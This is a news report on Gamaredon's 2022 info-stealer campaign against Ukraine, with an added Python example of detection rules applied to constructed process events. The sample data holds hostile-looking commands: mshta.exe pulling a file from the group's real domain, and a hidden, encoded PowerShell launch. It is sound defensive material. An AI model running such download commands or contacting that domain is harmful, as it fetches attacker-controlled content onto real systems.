15 August 2022

Russia-linked Gamaredon is continuing to target Ukrainian orgs with info-stealers

A Russia-linked hacker group is continuing to attack organizations in Ukraine with info-stealing malware. The ongoing cyber campaign is said to be an extension of the attacks detailed by Ukraine’s computer emergency response team in July 2022.

Symantec’s Threat Hunter Team, part of Broadcom Software, shared the technical details of the campaign, which has been attributed to the known advanced persistent threat group Gamaredon (also tracked as Armageddon or Shuckworm). The group has been active since 2014 and is exclusively focused on Ukraine.

In the observed campaign the attackers leveraged a self-extracting 7-Zip file, which was downloaded via the system’s default browser from a domain (a0698649[.]xsph[.]ru) that has been previously associated with Gamaredon activity. The domain was used in a phishing attack spoofing the Security Service of Ukraine with “Intelligence Bulletin” in the subject line, according to CERT-UA’s July security advisory.

The binaries in the 7-Zip files subsequently used mshta.exe to download an XML file, which was likely masquerading as an HTML application.

Once the XML file has been downloaded onto the victim network, a PowerShell stealer runs on the victim’s machine. The researchers said they found three very similar versions of this malware, which were likely deployed as a means to evade detection.

Symantec also found Backdoor.Pterodo, a well-known Gamaredon tool, on victim machines, where it came in the form of two VBS downloaders. These scripts are capable of calling PowerShell, uploading screenshots, and executing code downloaded from a command-and-control (C&C) server.

In addition, the researchers observed Gamaredon deploying the Giddome backdoor, another well-known Gamaredon tool. Some of these Giddome variants may have originated from VCD, H264, or ASC files. Similar to .ISO files, VCD files are images of a CD or DVD that Windows recognizes as an actual disc.

For remote access the threat actor leveraged the legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk - a common tactic used by ransomware and state-backed hacker groups.
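As an added example (not Symantec’s or CERT-UA’s detection logic, and not code from the original article), the following Python runs a handful of process-creation detection rules derived from the behaviours described above over constructed Sysmon-style events: mshta.exe fetching remote content, contact with the domain named in the article, PowerShell spawned by a script host, script hosts running scripts out of a user profile, and remote-administration tools launched from a script rather than by a user. The event records, file paths, the URL path after the domain, and the assumed Ammyy Admin binary name are all constructed for this example.

```python
"""Constructed process-creation events and simple detection rules for the
behaviours described in the article (added example; not Symantec's or
CERT-UA's detection logic)."""
import re
from typing import Dict, List, Tuple

# Domain taken from the article. Everything else in the sample data below
# (paths, URL path, command lines) is constructed for this example.
KNOWN_BAD_DOMAINS = {"a0698649.xsph.ru"}

# Remote-access tools named in the article. Matching on file name alone is
# weak (renaming defeats it); in production key on code-signing identity or
# hash. "aa_v3.exe" is assumed here to be Ammyy Admin's binary name.
REMOTE_ADMIN_TOOLS = {"anydesk.exe", "aa_v3.exe"}

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
HIDDEN_OR_ENCODED_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?\s|e\s)", re.IGNORECASE)

# Constructed Sysmon Event ID 1 style records, reduced to three fields.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Users\user\Downloads\report.exe",            # SFX payload
     "cmdline": "report.exe",
     "parent": r"C:\Users\user\Downloads\bulletin.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",                 # HTA from URL
     "cmdline": "mshta.exe http://a0698649.xsph.ru/constructed-path/page.xml",
     "parent": r"C:\Users\user\Downloads\report.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc QQBCAEMA",       # stealer stage
     "parent": r"C:\Windows\System32\mshta.exe"},
    {"image": r"C:\Windows\System32\wscript.exe",               # VBS downloader
     "cmdline": r"wscript.exe C:\Users\user\AppData\Roaming\update.vbs",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",    # remote access
     "cmdline": "AnyDesk.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process",                   # benign admin use
     "parent": r"C:\Windows\explorer.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    hits: List[str] = []
    image, parent = basename(event["image"]), basename(event["parent"])
    cmd = event["cmdline"]

    # Rule 1: mshta.exe pulling content from a remote URL. Legitimate HTA use
    # almost always points at a local file, so a URL argument is suspicious.
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_content")

    # Rule 2: any command line referencing a domain on the indicator list.
    for host in URL_RE.findall(cmd):
        if host.lower() in KNOWN_BAD_DOMAINS:
            hits.append("known_c2_domain")
            break

    # Rule 3: PowerShell spawned by a script host, the hand-off the article
    # describes (HTA/VBS downloaders launching the PowerShell stealer).
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawned_powershell")

    # Rule 4: PowerShell asked to hide its window or run an encoded command.
    if image == "powershell.exe" and HIDDEN_OR_ENCODED_RE.search(cmd):
        hits.append("powershell_hidden_or_encoded")

    # Rule 5: wscript/cscript running a script out of the user profile, where
    # dropped VBS downloaders typically live.
    if image in {"wscript.exe", "cscript.exe"} and "\\appdata\\" in cmd.lower():
        hits.append("script_host_from_appdata")

    # Rule 6: a remote-administration tool started by a script host or shell
    # instead of by the user (explorer.exe) or an installer.
    if image in REMOTE_ADMIN_TOOLS and parent in SCRIPT_HOSTS | SHELLS:
        hits.append("remote_admin_tool_from_script")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run every rule over every event; return (image name, hits) for each event that fired."""
    return [(basename(ev["image"]), evaluate(ev)) for ev in events if evaluate(ev)]


if __name__ == "__main__":
    for image, rule_hits in triage(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rule_hits)}")
```

Each rule is deliberately narrow so that a single hit is only a lead; it is the chain (SFX payload, then mshta.exe with a URL, then PowerShell under mshta.exe, then a remote-access tool under PowerShell) that a defender would correlate on the same host within a short window.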

“As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations,” Symantec concluded.
